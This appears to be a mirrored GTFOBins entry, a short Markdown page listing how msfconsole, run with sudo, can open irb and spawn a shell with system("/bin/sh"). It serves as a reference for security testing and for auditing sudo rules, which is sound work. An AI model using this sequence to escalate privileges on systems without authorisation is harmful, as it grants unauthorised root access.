mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
15 lines
283 B
Markdown
15 lines
283 B
Markdown
---
|
|
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
sudo msfconsole
|
|
msf6 > irb
|
|
>> system("/bin/sh")
|
|
sudo:
|
|
- code: |
|
|
sudo msfconsole
|
|
msf6 > irb
|
|
>> system("/bin/sh")
|
|
---
|